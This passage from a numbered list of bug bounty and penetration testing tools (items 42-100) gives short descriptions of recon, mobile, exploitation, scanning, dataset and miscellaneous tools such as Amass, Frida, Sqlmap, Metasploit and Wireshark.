42. Findomain: Findomain offers a dedicated monitoring service hosted in Amazon (only the
local version is free), that allows you to monitor your target domains and send alerts to Discord
and Slack webhooks or Telegram chats when new subdomains are found.
43. Amass: The OWASP Amass Project performs network mapping of attack surfaces and
external asset discovery using open source information gathering and active reconnaissance
techniques.
44. Dnsgen: This tool generates a combination of domain names from the provided input.
Combinations are created based on wordlist. Custom words are extracted per execution.
45. Dngrep: A utility for quickly searching presorted DNS names. Built around the Rapid7 rdns
& fdns dataset.
46. Wfuzz: Wfuzz has been created to facilitate the task in web applications assessments and it is
based on a simple concept: it replaces any reference to the FUZZ keyword by the value of a
given payload.
47. Aquatone: Aquatone is a tool for visual inspection of websites across a large number of
hosts, which provides a convenient overview of HTTP-based attack surface.
48. WhatWeb: WhatWeb recognizes web technologies including content management systems
(CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and
embedded devices. WhatWeb has over 1800 plugins, each to recognise something different.
WhatWeb also identifies version numbers, email addresses, account IDs, web framework
modules, SQL errors, and more.
49. Dirb: DIRB is a web content scanner. It launches a dictionary based attack against a web
server and analyzes the response.
50. Dnscan: Dnscan is a python wordlist-based DNS subdomain scanner.
51. Sublert: Sublert is a security and reconnaissance tool that was written in Python to leverage
certificate transparency for the sole purpose of monitoring new subdomains deployed by specific
organizations and an issued TLS/SSL certificate. The tool is supposed to be scheduled to run
periodically at fixed times, dates, or intervals (Ideally each day). New identified subdomains will
be sent to Slack workspace with a notification push. Furthermore, the tool performs DNS
resolution to determine working subdomains.
52. Recon-ng: Recon-ng is a full-featured reconnaissance framework designed with the goal of
providing a powerful environment to conduct open source, web-based reconnaissance quickly
and thoroughly.
53. Jok3r: Jok3r is a framework that helps penetration testers with network infrastructure and
web security assessments. Its goal is to automate as much as possible in order to quickly identify
and exploit "low-hanging fruit" and "quick win" vulnerabilities on most common TCP/UDP
services and most common web technologies (servers, CMS, languages...).
54. DirBuster: This tool is a multi-threaded java application that is used to perform brute force
over directories and file names on web and application servers. DirBuster attempts to find hidden
directories and pages within a web application, providing users with an additional attack vector.
55. Altdns: Altdns is a DNS recon tool that allows for the discovery of subdomains that conform
to patterns. Altdns takes in words that could be present in subdomains under a domain (such as
test, dev, staging), as well as a list of known subdomains.
56. Recon_profile: This tool helps create easy aliases to run via SSH or a terminal.
57. BBHT: Bug Bounty Hunting Tools is a script to install the most popular tools used while
looking for vulnerabilities for a bug bounty program.
Mobile Hacking
58. MobSF: Mobile Security Framework (MobSF) is an automated, all-in-one mobile application
(Android/iOS/Windows) pen-testing, malware analysis and security assessment framework
capable of performing static and dynamic analysis.
59. Jadx: Jadx is a dex-to-Java decompiler, providing command line and GUI tools for producing
Java source code from Android Dex and Apk files.
60. Dex2Jar: Dex2Jar is a freely available tool to work with Android ".dex" and Java ".class"
files.
61. Radare2: A free/libre toolchain for easing several low level tasks, such as forensics, software
reverse engineering, exploiting, debugging, etc. It is composed of a large number of libraries
(which are extended with plugins) and programs that can be automated with almost any
programming language.
62. Genymotion: Cross-platform Android emulator for developers & QA engineers. Develop &
automate your tests to deliver best quality apps.
63. Frida "Universal" SSL Unpinner: Universal unpinner.
64. Frida: Dynamic instrumentation toolkit for developers, reverse-engineers, and security
researchers.
Exploitation
65. SQLNinja: Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web
application that uses Microsoft SQL Server as its back-end.
66. XSS hunter: XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities,
including the often-missed blind XSS. The service works by hosting specialized XSS probes
which, upon firing, scan the page and send information about the vulnerable page to the XSS
Hunter service.
67. NoSQLMap: NoSQLMap is an open source Python tool designed to audit for, as well as
automate injection attacks, and exploit default configuration weaknesses in NoSQL databases
and web applications using NoSQL to disclose or clone data from the database.
68. Ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object
deserialization.
69. Sqlmap: Sqlmap is an open-source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over database servers. It comes with a
powerful detection engine, many niche features for the ultimate penetration tester, and a broad
range of switches including database fingerprinting, data fetching from the database,
accessing the underlying file system, and executing commands on the operating system via
out-of-band connections.
70. SSRFTest: SSRF testing tool.
71. Retire.JS: Scanning website for vulnerable js libraries.
72. Spiderfoot: SpiderFoot is an open source intelligence (OSINT) automation tool. It integrates
with just about every data source available, and automates OSINT collection so that you can
focus on data analysis.
Scanners/Frameworks
73. OpenVAS: OpenVAS is a full-featured vulnerability scanner. Its capabilities include
unauthenticated testing, authenticated testing, various high level and low-level Internet and
industrial protocols, performance tuning for large-scale scans and a powerful internal
programming language to implement any type of vulnerability test.
74. Nikto: Nikto is an Open Source (GPL) web server scanner which performs comprehensive
tests against web servers for multiple items, including over 6700 potentially dangerous
files/programs, checks for outdated versions of over 1250 servers, and version specific problems
on over 270 servers.
75. Wapiti: Wapiti allows you to audit the security of your websites or web applications. It
performs "black-box" scans (it does not study the source code) of the web application by
crawling the web pages of the deployed webapp, looking for scripts and forms where it can inject
data.
76. Metasploit: Metasploit is an open-source penetration testing framework.
77. Maltego: Maltego is an open source intelligence (OSINT) and graphical link analysis tool for
gathering and connecting information for investigative tasks.
78. Canvas: CANVAS offers hundreds of exploits, an automated exploitation system, and a
comprehensive, reliable exploit development framework to penetration testers and security
professionals worldwide.
79. Sn1per: Sn1per Community Edition is an automated scanner that can be used during a
penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's
premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and
Corporate Security teams to manage large environments and pentest scopes.
80. Lazyrecon: LazyRecon is a script written in Bash, intended to automate the tedious tasks of
reconnaissance and information gathering. The information is organized in an html report at the
end, which helps you identify next steps.
81. Osmedeus: Osmedeus allows you to automatically run the collection of awesome tools for
reconnaissance and vulnerability scanning against the target.
82. Reconness: ReconNess helps you to run and keep all your #recon in the same place allowing
you to focus only on the potentially vulnerable targets without distraction and without requiring a
lot of bash skill, or programming skill in general.
83. IronWASP: IronWASP (Iron Web Application Advanced Security testing Platform) is an
open-source tool used for web application vulnerability testing. It is designed in such a way that
users having the right knowledge can create their own scanners using this as a framework.
IronWASP is built using Python and Ruby and users having knowledge of them would be able to
make full use of the platform. However, IronWASP provides a lot of features that are simple to
understand.
84. Nmap: Nmap ("Network Mapper") is a free and open-source (license) utility for network
discovery and security auditing.
Datasets / Freemium Services
85. Shodan: Shodan provides a public API that allows other tools to access all of Shodan's data.
Integrations are available for Nmap, Metasploit, Maltego, FOCA, Chrome, Firefox and many
more.
86. Censys: Censys scans the most ports and houses the biggest certificate database in the world,
and provides the most up-to-date, thorough view of your known and unknown assets.
87. Rapid7 Forward DNS (FDNS): This dataset contains the responses to DNS requests for all
forward DNS names known by Rapid7's Project Sonar.
88. C99.nl: C99.nl is a scanner that scans an entire domain to find as many subdomains as
possible.
89. Seclists: SecLists is the security tester's companion. It's a collection of multiple types of lists
used during security assessments, collected in one place. List types include usernames,
passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. The
goal is to enable a security tester to pull this repository onto a new testing box and have access to
every type of list that may be needed.
90. Payloads All The Things: A list of useful payloads and bypasses for Web Application
Security. Feel free to improve with your payloads and techniques.
Miscellaneous Hacking Tools
91. Ettercap: Ettercap is a comprehensive suite which features sniffing of live connections,
content filtering, and support for active and passive dissection of many protocols, including
multiple features for network and host analysis.
92. Transformations: Transformations makes it easier to detect common data obscurities, which
may uncover security vulnerabilities or give insight into bypassing defenses.
93. John the Ripper: John the Ripper is free and Open Source software, distributed primarily in a
source code form.
94. Wireshark: Wireshark® is a network protocol analyzer that lets you capture and interactively
browse the traffic running on a computer network.
95. Foxyproxy: FoxyProxy is an advanced proxy management tool that completely replaces
Firefox's limited proxying capabilities. For a simpler tool and less advanced configuration
options, please use FoxyProxy Basic.
96. Wappalyzer: Wappalyzer is a browser extension that uncovers the technologies used on
websites. It detects content management systems, eCommerce platforms, web servers, JavaScript
frameworks, analytics tools and many more.
97. BuiltWith: BuiltWith's goal is to help developers, researchers and designers find out what
technologies web pages are using, which may help them decide what technologies to implement
themselves.
98. Altair: Altair GraphQL Client helps you debug GraphQL queries and implementations -
taking care of the hard part so you can focus on actually getting things done.
99. THC Hydra: This tool is a proof-of-concept code, designed to give researchers and security
consultants the possibility to show how easy it would be to gain unauthorized access from
remote to a system.
100. Swiftness X: A note taking tool for BB and pentesting.